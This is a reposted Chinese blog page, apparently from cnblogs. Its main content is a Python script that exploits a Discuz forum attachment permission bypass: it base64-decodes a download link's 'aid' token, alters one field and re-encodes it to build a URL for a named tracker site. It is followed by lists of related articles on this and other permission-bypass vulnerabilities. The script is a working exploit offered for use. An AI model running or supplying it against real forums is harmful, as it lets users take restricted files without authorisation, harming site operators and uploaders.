import base64
import re# 这里是你鼠标单击右键-》保存要下载的链接。替换 url = '你复制下来的链接'
# 其中"第一部分"是'.forum.php?mod=attachment&aid=' "第二部分"是 forum.php?mod=attachment&aid=
# 后面会用到
url = 'forum.php?mod=attachment&aid=NjE4NzF8NmM2ZDU4Y2Z8MTQ5ODgzNjUyMnwwfDIyMTg3'# url0是你要下载的网址的主页，加上"第二部分" 也就是 "forum.php?mod=attachment&aid="
url0 = 'http://m.tracker.7do.net/forum.php?mod=attachment&aid='# 正则表达，需要将括号内的"第一部分" 也就是 "forum.php\?mod=attachment&aid=" 替换成你复制链接的第一部分
p = r'(forum.php\?mod=attachment&aid=)(.+)'
aid = re.search(p, url).group(2)
z = base64.b64decode(aid)#下面的正则不用管
# print(z)
p = r"(b')(.+)(')"
z1 = re.search(p, str(z)).group(2)
# print(z1)
p = r"(.+)(\|0\|)(.+)"
z2 = re.search(p,str(z1)).group(1)
p = r"(.+)(\|0\|)(.+)"
z3 = re.search(p,str(z1)).group(3)
# print(z2)
k = z2 + '|2|' + z3
k = bytes(k, encoding = "utf8")
# print(k)
# k = b'61871|acf3aa27|1498835323|1|22187'
j = base64.b64encode(k)
# print(j)
p = r"(b')(.+)(')"
j1 = re.search(p, str(j)).group(2)
# print(j1)

url1 = url0 + j1
print(url1)

转载于:https://www.cnblogs.com/cbds/p/7101123.html

Python 实现 Discuz论坛附件下载权限绕过漏洞相关推荐

1. Discuz论坛附件下载权限绕过漏洞

   近日,有网友在乌云上发布了一则Discuz论坛附件下载权限绕过漏洞,能够任意下载带有权限的附件并且无需扣除自身积分.目前Discuz正在处理中,但暂未放出漏洞补丁,有需要的朋友不妨趁漏洞修补之前到各论 ...

2. php绕过授权下载,Discuz附件下载权限绕过方法

   越权下载含有"阅读权限"的插件.下载插件免扣币 重现步骤: 1.使用管理员账户,上传一个有高阅读权限的附件 2.使用低权限的用户账户,下载附件,这个时候,Discuz会提示无权下载 ...

3. 众至科技：漏洞通告 | 微软10月发布多个安全漏洞；Apache Shiro权限绕过漏洞；Apache Commons存在代码执行漏洞

   微软发布10月多个安全漏洞 1.漏洞概述 2022年10月11日,微软发布了10月安全更新,此次更新修复了包括2个0 day漏洞在内的84个安全漏洞(不包括10月3日修复的12个Microsoft   ...

4. shiro权限绕过漏洞

   1.shiro权限绕过漏洞 1.1.漏洞成因分析 Apahce Shiro 由于处理身份验证请求时出错,存在"权限绕过漏洞"(漏洞编号:CVE-2020-11989),远程攻击者可 ...

5. couchdb 垂直权限绕过漏洞（cve-2017-12635）

   Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库".它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和 ...

6. TrendNET路由器权限绕过漏洞（CVE-2018-7034）

   TrendNET路由器权限绕过漏洞,攻击者通过设置$AUTHORIZED_GROUP >= 1绕过权限验证 影响版本: TEW-751DR – v1.03B03 TEW-752DRU – v1. ...

7. launchAnyWhere: Activity组件权限绕过漏洞解析

   前言 今年3月份,知名反病毒软件公司卡巴斯基实验室发布了一份关于中国电商平台拼多多的调查报告,称该平台的安装程序中含有恶意代码.这一消息引起了广泛的关注和讨论,也引发了人们对于拼多多平台安全性的担忧 ...

8. python discuz_[Python代码]Discuz!论坛（X2.5）发帖及回复脚本

   更多 昨天,我介绍了Discuz!论坛登录的Python脚本实现(点击进入).今天,我继续这一系列,介绍Discuz!论坛最常见的一类脚本操作--发帖及回复.这里,我只实现普通主题的发表以及回复的脚本 ...

9. python登陆Discuz!论坛通用代码

   分享一例python实现的登陆Discuz!论坛通用代码. 代码: #coding:gbk import urllib2,urllib,cookielib,re'''通用的登陆DZ论坛参数说明parm ...

10. iOS 相册权限绕过漏洞

    在 App Store 上有一款名叫 "时间规划局" 的应用可以在未获取相册权限的情况下读取照片.可能是 App 调用了苹果的私有库,绕过了系统的授权机制. 在 iOS 12.1. ...

最新文章

1. 省呱呱典型用户和用户场景
2. cmstop框架中的js设计content.js
3. Java并发编程(04)：线程间通信，等待/通知机制
4. MinGW 64的安装 - 官网sourceforge安装失败非翻墙解决办法
5. 【OpenCV】OpenCV函数精讲之 -- imshow()函数
6. matlab怎么利用圆形度提取园,基于Matlab+GUI图像处理的物料粒度与圆形度测试.pdf...
7. STM32|4-20mA输出电路
8. Bresenham画线算法详解及其OpenGL编程实现
9. Solidworks常用技巧
10. php 开源周报系统,Pulsar 社区周报｜2021-03-01～2021-03-07
11. word给表头和图题按章节编号
12. 微分方程的数值解法—四阶龙格库塔(Runge-Kutta)的推导以及C代码实现
13. Kinect的Kinect Manager脚本简介
14. 串的模式匹配算法 ← BF算法
15. 计算机英语200心得体会,学英语的心得体会作文200字作文:学习英语的感受的英语作文（100~120词）...
16. Excel数据透视，日期最大值或最小值显示为0
17. linux awk 字符串匹配,awk匹配字符串
18. graphviz画图之张柏芝前夫是谢霆锋
19. 全新视角！带你一文读懂ChatGPT！
20. 【VMware】win 10：解决 win 7 虚拟机系统屏幕没有适应 vmware 窗口全屏问题

热门文章

1. DynamipsGUI使用方法
2. 【渗透测试】IIS6.0的安装、使用与相关漏洞
3. aspectjweaver.jar aspectjrt.jar
4. 移动办公应用的需求分析讨论
5. 电脑桌面图标突然不见了
6. 怎样将自己学到的东西发布到博客
7. 2022，云上开发的新纪元
8. redhat官方文档下载方法
9. Eclipse及其常用插件的下载地址
10. PortableApps使用入门